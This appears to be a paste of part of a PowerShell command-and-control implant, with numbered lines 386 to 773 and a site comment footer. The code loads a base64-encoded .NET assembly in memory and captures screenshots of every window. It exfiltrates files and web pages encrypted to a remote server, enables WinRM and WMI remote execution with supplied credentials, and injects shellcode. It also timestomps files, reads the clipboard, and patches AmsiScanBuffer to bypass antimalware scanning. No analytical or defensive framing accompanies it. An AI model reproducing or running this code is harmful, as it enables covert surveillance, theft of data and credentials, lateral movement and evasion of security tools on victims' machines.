EUUdEkkIEkkDBhFFBQAAHRJJBCAAEUUIAAIRRRFFEUUFBwIRDBgFIAIBCAgGAAESZRJhAyAAGAQgAQEYCLd6XFYZNOCJCLA/X38R1Qo6BCAAzAAEAAAAQAQAAAACBH8DAAABAgEWAgYIAgYJDAAJAhgICAgIGAgICAYAAxgYCAgEAAEYGAMAABgFAAICGBgFAAIYGBgGAAESQRFFBAAAEkEFAAESQQIFAAIYDg4HAAQYGBgODgcAAhgYEBEMBgADAhgYCQQAAQgIBgACAhIQGAQAAQIYBgADGA4CCQcAAwIYEhQYBwAEGA4JAgkGAAMYCQIJBwADAhgSGBgHAAMIGBJNCAYAAhgYEBgFIAIBHBgFIAICDhgJIAQSWQ4YEl0cBSABAhJZBSACAhgICSAEElkYCBJdHAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAPAQAKU2NyZWVuc2hvdAAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAxNwAAKQEAJDQyNGIyMjY4LTY0MzctNDgyNy1iMDVjLTNmNmMyN2ZjMGY0MgAADAEABzEuMC4wLjAAAAAAAAAAAABJzkZaAAAAAAIAAAAcAQAA7DMAAOwVAABSU0RTbxrdln4JwUiXVZw4MAy/MAEAAABDOlxVc2Vyc1xhZG1pblxzb3VyY2VccmVwb3NcU2NyZWVuc2hvdFxTY3JlZW5zaG90XG9ialxSZWxlYXNlXFNjcmVlbnNob3QucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADA1AAAAAAAAAAAAAEo1AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8NQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAACwDAAAAAAAAAAAAACwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsASMAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAABoAgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAAPgALAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAFMAYwByAGUAZQBuAHMAaABvAHQAAAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4AMAAAAD4ADwABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAUwBjAHIAZQBlAG4AcwBoAG8AdAAuAGQAbABsAAAAAABIABIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAxADcAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAEYADwABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABTAGMAcgBlAGUAbgBzAGgAbwB0AC4AZABsAGwAAAAAADYACwABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAUwBjAHIAZQBlAG4AcwBoAG8AdAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAMAAAAXDUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  387.         $dllbytes  = [System.Convert]::FromBase64String($ps)
  388.         $assembly = [System.Reflection.Assembly]::Load($dllbytes)
  389.     }
  390.  
  391.     $processes = Get-Process
  392.     foreach ($p in $processes)
  393.     {
  394.         try {
  395.             [IntPtr] $windowHandle = $p.MainWindowHandle;
  396.             $msimage = New-Object IO.MemoryStream
  397.             $bitmap = [WindowStation]::Capture($windowHandle);
  398.             $bitmap.save($msimage, "bmp")
  399.             $b64 = [Convert]::ToBase64String($msimage.toarray())
  400.             $bitmap.Dispose();
  401.             $ReadCommand = "get-screenshot"
  402.             $ReadCommand = Encrypt-String $key $ReadCommand
  403.             $send = Encrypt-String2 $key $b64
  404.             $UploadBytes = getimgdata $send
  405.             (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
  406.         } catch {}
  407.     }
  408.     $error.clear()
  409. }
  410. function Download-Files
  411. {
  412.     param
  413.     (
  414.         [string] $Directory
  415.     )
  416.     $files = Get-ChildItem $Directory -Recurse | Where-Object{!($_.PSIsContainer)}
  417.     foreach ($item in $files)
  418.     {
  419.         Download-File $item.FullName
  420.     }
  421. }
  422. function Get-RandomName
  423. {
  424.     param
  425.     (
  426.         [int]$Length
  427.     )
  428.     $set    = 'abcdefghijklmnopqrstuvwxyz0123456789'.ToCharArray()
  429.     $result = ''
  430.     for ($x = 0; $x -lt $Length; $x++)
  431.     {$result += $set | Get-Random}
  432.     return $result
  433. }
  434. function Download-File
  435. {
  436.     param
  437.     (
  438.         [string] $Source
  439.     )
  440.     try {
  441.         $fileName = Resolve-PathSafe $Source
  442.         $randomName = Get-RandomName -Length 5
  443.         $fileExt = [System.IO.Path]::GetExtension($fileName)
  444.         $fileNameOnly = [System.IO.Path]::GetFileNameWithoutExtension($fileName)
  445.         $fullNewname = $Source
  446.         $bufferSize = 10737418;
  447.  
  448.         $fs = [System.IO.File]::Open($fileName, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite);        
  449.         $fileSize =(Get-Item $fileName).Length
  450.        
  451.         $chunkSize = $fileSize / $bufferSize
  452.         $totalChunks = [int][Math]::Ceiling($chunkSize)
  453.         if ($totalChunks -lt 1) {$totalChunks = 1}
  454.         $totalChunkStr = $totalChunks.ToString("00000")
  455.         $totalChunkByte = [System.Text.Encoding]::UTF8.GetBytes($totalChunkStr)
  456.         $Chunk = 1
  457.         $finfo = new-object System.IO.FileInfo ($fileName)
  458.         $size = $finfo.Length
  459.         $str = New-Object System.IO.BinaryReader($fs);
  460.         do {
  461.             $ChunkStr = $Chunk.ToString("00000")
  462.             $ChunkedByte = [System.Text.Encoding]::UTF8.GetBytes($ChunkStr)
  463.             $preNumbers = New-Object byte[] 10
  464.             $preNumbers = ($ChunkedByte+$totalChunkByte)
  465.             $readSize = $bufferSize;
  466.             $chunkBytes = $str.ReadBytes($readSize);
  467.             $ReadCommand = "download-file "+$fullNewname
  468.             $ReadCommand = Encrypt-String $key $ReadCommand
  469.             $send = Encrypt-Bytes $key ($preNumbers+$chunkBytes)
  470.             $UploadBytes = getimgdata $send
  471.             (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
  472.             ++$Chunk
  473.         } until (($size -= $bufferSize) -le 0);
  474.     } catch {
  475.         $Output = "ErrorCmd: " + $error[0]
  476.         $ReadCommand = "Error downloading file "+$fullnewname
  477.         $ReadCommand = Encrypt-String $key $ReadCommand  
  478.         $send = Encrypt-String2 $key $output
  479.         $UploadBytes = getimgdata $send
  480.         (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
  481.     }
  482. }
  483. function Posh-Delete
  484. {
  485.     param
  486.     (
  487.         [string] $Destination
  488.     )
  489.     try {
  490.     $file = Get-Item $Destination -Force
  491.     $file.Attributes = "Normal"
  492.     $content = New-Object Byte[] $file.length
  493.     (New-Object Random).NextBytes($content)
  494.     [IO.File]::WriteAllBytes($file,$content)
  495.     Remove-Item $Destination -Force
  496.     } catch {
  497.     echo $error[0]
  498.     }
  499. }
  500. function Upload-File
  501. {
  502.     param
  503.     (
  504.         [string] $Base64,
  505.         [string] $Destination
  506.     )
  507.     try {
  508.     write-output "Uploaded file as HIDDEN & SYSTEM to: $Destination"
  509.     write-output "Run Get-ChildItem -Force to view the uploaded files"
  510.     $fileBytes = [Convert]::FromBase64String($Base64)
  511.     [io.file]::WriteAllBytes($Destination, $fileBytes)
  512.     $file = Get-Item $Destination -Force
  513.     $attrib = $file.Attributes
  514.     $attrib = "Hidden,System"
  515.     $file.Attributes = $attrib  
  516.     } catch {
  517.     echo $error[0]
  518.     }  
  519. }
  520. function Resolve-PathSafe
  521. {
  522.     param
  523.     (
  524.         [string] $Path
  525.     )
  526.      
  527.     $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($Path)
  528. }
  529. function EnableWinRM {
  530. Param
  531. (
  532. [string]
  533. $username,
  534. [string]
  535. $password,
  536. [string]
  537. $computer
  538. )
  539. Invoke-command -computer localhost -credential $getcreds -scriptblock { set-itemproperty -path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Value 1 -Type Dword}
  540. Invoke-Command -Computer localhost -Credential $getcreds -Scriptblock {Set-Item WSMan:localhost\client\trustedhosts -value * -force}
  541. $command = "cmd /c powershell.exe -c Set-WSManQuickConfig -Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $True; Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force"
  542. $PSS = ConvertTo-SecureString $password -AsPlainText -Force
  543. $getcreds = new-object system.management.automation.PSCredential $username,$PSS
  544. Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $computer -Credential $getcreds -ArgumentList $command
  545. }
  546.  
  547. function DisableWinRM {
  548. Param
  549. (
  550. [string]
  551. $username,
  552. [string]
  553. $password,
  554. [string]
  555. $computer
  556. )
  557. $command = "cmd /c powershell.exe -c Set-Item WSMan:\localhost\Service\Auth\Basic -Value $False;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $False;winrm delete winrm/config/listener?address=*+transport=HTTP;Stop-Service -force winrm;Set-Service -Name winrm -StartupType Disabled"
  558. $PSS = ConvertTo-SecureString $password -AsPlainText -Force
  559. $getcreds = new-object system.management.automation.PSCredential $username,$PSS
  560. Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $computer -Credential $getcreds -ArgumentList $command
  561. }
  562. function WMICommand {
  563. Param
  564. (
  565. [string]
  566. $username,
  567. [string]
  568. $password,
  569. [string]
  570. $computer,
  571. [string]
  572. $command
  573. )
  574. $PSS = ConvertTo-SecureString $password -AsPlainText -Force
  575. $getcreds = new-object system.management.automation.PSCredential $username,$PSS
  576. $WMIResult = Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $computer -Credential $getcreds -ArgumentList $command
  577. If ($WMIResult.Returnvalue -eq 0) {
  578.     Write-Output "Executed WMI Command with Sucess: $Command `n"
  579. } else {
  580.     Write-Output "WMI Command Failed - Could be due to permissions or UAC is enabled on the remote host, Try mounting the C$ share to check administrative access to the host"
  581. }
  582. }
  583.  
  584. Function Get-ProcessFull {
  585.  
  586. [System.Diagnostics.Process[]] $processes64bit = @()
  587. [System.Diagnostics.Process[]] $processes32bit = @()
  588.  
  589.  
  590. $owners = @{}
  591. gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
  592.  
  593. $AllProcesses = @()
  594.  
  595.     if (Test-Win64) {
  596.         Write-Output "64bit implant running on 64bit machine"
  597.     }
  598.  
  599. if (Test-Win64) {
  600.     foreach($process in get-process) {
  601.     $modules = $process.modules
  602.     foreach($module in $modules) {
  603.         $file = [System.IO.Path]::GetFileName($module.FileName).ToLower()
  604.         if($file -eq "wow64.dll") {
  605.             $processes32bit += $process
  606.             $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, Username
  607.             $pobject.Id = $process.Id
  608.             $pobject.StartTime = $process.StartTime
  609.             $pobject.Name = $process.Name
  610.             $pobject.Path = $process.Path
  611.             $pobject.Arch = "x86"
  612.             $pobject.UserName = $owners[$process.Id.tostring()]
  613.             $AllProcesses += $pobject
  614.             break
  615.         }
  616.     }
  617.  
  618.     if(!($processes32bit -contains $process)) {
  619.         $processes64bit += $process
  620.         $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, UserName
  621.         $pobject.Id = $process.Id
  622.         $pobject.StartTime = $process.StartTime
  623.         $pobject.Name = $process.Name
  624.         $pobject.Path = $process.Path
  625.         $pobject.Arch = "x64"
  626.         $pobject.UserName = $owners[$process.Id.tostring()]
  627.         $AllProcesses += $pobject
  628.     }
  629. }
  630. }
  631. elseif ((Test-Win32) -and (-Not (Test-Wow64))) {
  632. foreach($process in get-process) {
  633.     $processes32bit += $process
  634.     $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, Username
  635.     $pobject.Id = $process.Id
  636.     $pobject.StartTime = $process.StartTime
  637.     $pobject.Name = $process.Name
  638.     $pobject.Path = $process.Path
  639.     $pobject.Arch = "x86"
  640.     $pobject.UserName = $owners[$process.Id.tostring()]
  641.     $AllProcesses += $pobject
  642. }
  643. }
  644. elseif ((Test-Win32) -and (Test-Wow64)) {
  645.     foreach($process in get-process) {
  646.     $modules = $process.modules
  647.     foreach($module in $modules) {
  648.         $file = [System.IO.Path]::GetFileName($module.FileName).ToLower()
  649.         if($file -eq "wow64.dll") {
  650.             $processes32bit += $process
  651.             $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, Username
  652.             $pobject.Id = $process.Id
  653.             $pobject.StartTime = $process.StartTime
  654.             $pobject.Name = $process.Name
  655.             $pobject.Path = $process.Path
  656.             $pobject.Arch = "x86"
  657.             $pobject.UserName = $owners[$process.Id.tostring()]
  658.             $AllProcesses += $pobject
  659.             break
  660.         }
  661.     }
  662.  
  663.     if(!($processes32bit -contains $process)) {
  664.         $processes64bit += $process
  665.         $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, UserName
  666.         $pobject.Id = $process.Id
  667.         $pobject.StartTime = $process.starttime
  668.         $pobject.Name = $process.Name
  669.         $pobject.Path = $process.Path
  670.         $pobject.Arch = "x64"
  671.         $pobject.UserName = $owners[$process.Id.tostring()]
  672.         $AllProcesses += $pobject
  673.     }
  674. }
  675. } else {
  676.     Write-Output "Unknown Architecture"
  677. }
  678.  
  679. $AllProcesses|Select ID, UserName, Arch, Name, Path, StartTime | format-table -auto
  680.  
  681. }
  682. Function Invoke-Netstat {                      
  683. try {            
  684.     $TCPProperties = [System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties()            
  685.     $Connections = $TCPProperties.GetActiveTcpListeners()            
  686.     foreach($Connection in $Connections) {            
  687.         if($Connection.address.AddressFamily -eq "InterNetwork" ) { $IPType = "IPv4" } else { $IPType = "IPv6" }
  688.         $OutputObj = New-Object -TypeName PSobject            
  689.         $OutputObj | Add-Member -MemberType NoteProperty -Name "LocalAddress" -Value $connection.Address            
  690.         $OutputObj | Add-Member -MemberType NoteProperty -Name "ListeningPort" -Value $Connection.Port            
  691.         $OutputObj | Add-Member -MemberType NoteProperty -Name "IPV4Or6" -Value $IPType            
  692.         $OutputObj            
  693.     }            
  694.            
  695. } catch {            
  696.     Write-Error "Failed to get listening connections. $_"            
  697. }          
  698. }
  699. Function Get-Webpage {
  700.     param ($url)
  701.     $file = (New-Object System.Net.Webclient).DownloadString($url)|Out-String
  702.     $ReadCommand = "download-file web.html"
  703.     $ReadCommand = Encrypt-String $key $ReadCommand
  704.     $bytes = [System.Text.Encoding]::UTF8.GetBytes($file)
  705.     $base64 = [Convert]::ToBase64String($bytes)  
  706.     $Output = Encrypt-String2 $key $base64
  707.     $UploadBytes = getimgdata $Output
  708.     (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
  709. }
  710. Function AutoMigrate {
  711. if (($p = Get-Process | ? {$_.id -eq $pid}).name -eq "powershell") {
  712.     $t=$true
  713. }
  714. if ($t -and [IntPtr]::size -eq 8){
  715.    Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode64))
  716. }
  717. elseif (($t -and [IntPtr]::size -eq 4)) {
  718.     Inject-Shellcode -x86 -Shellcode ([System.Convert]::FromBase64String($Shellcode86))
  719. }
  720. }
  721. Function AutoMigrate-Always {
  722. if ([IntPtr]::size -eq 8){
  723.    Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode64))
  724. }
  725. elseif ([IntPtr]::size -eq 4) {
  726.     Inject-Shellcode -x86 -Shellcode ([System.Convert]::FromBase64String($Shellcode86))
  727. }
  728. }
  729. Function TimeStomp($File, $Date) {
  730.     $file=(gi $file)
  731.     $file.LastWriteTime=$date;
  732.     $file.LastAccessTime=$date;
  733.     $file.CreationTime=$date;
  734. }
  735. Function Get-Clipboard {
  736.     add-type -a system.windows.forms
  737.     [windows.forms.clipboard]::GetText()
  738. }
  739. Function Get-AllServices {
  740.     $Keys = Get-ChildItem HKLM:\System\CurrentControlSet\services; $Items = $Keys | Foreach-Object {Get-ItemProperty $_.PsPath }
  741.     ForEach ($Item in $Items) {$n=$Item.PSChildName;$i=$Item.ImagePath;$d=$Item.Description; echo "Name: $n `nImagePath: $i `nDescription: $d`n"}
  742. }
  743. Function Get-AllFirewallRules($path) {
  744.     $Rules=(New-object -comObject HNetCfg.FwPolicy2).rules
  745.     if ($path) {
  746.         $Rules | export-csv $path -NoTypeInformation
  747.     } else {
  748.         $Rules
  749.     }
  750. }
  751. Function Unhook-AMSI {
  752.    
  753.     $win32 = @"
  754. using System.Runtime.InteropServices;
  755. using System;
  756. public class Win32 {
  757. [DllImport("kernel32")]
  758. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  759. [DllImport("kernel32")]
  760. public static extern IntPtr LoadLibrary(string name);
  761. [DllImport("kernel32")]
  762. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect
  763. );
  764. }
  765. "@
  766. Add-Type $win32
  767. $ptr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScanBuffer")
  768. $b = 0
  769. [Win32]::VirtualProtect($ptr, [UInt32]5, 0x40, [Ref]$b)
  770. $buf = New-Object Byte[] 7
  771. $buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18; $buf[6] = 0x00;
  772. [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)
  773. }
Add Comment
Please, Sign In to add comment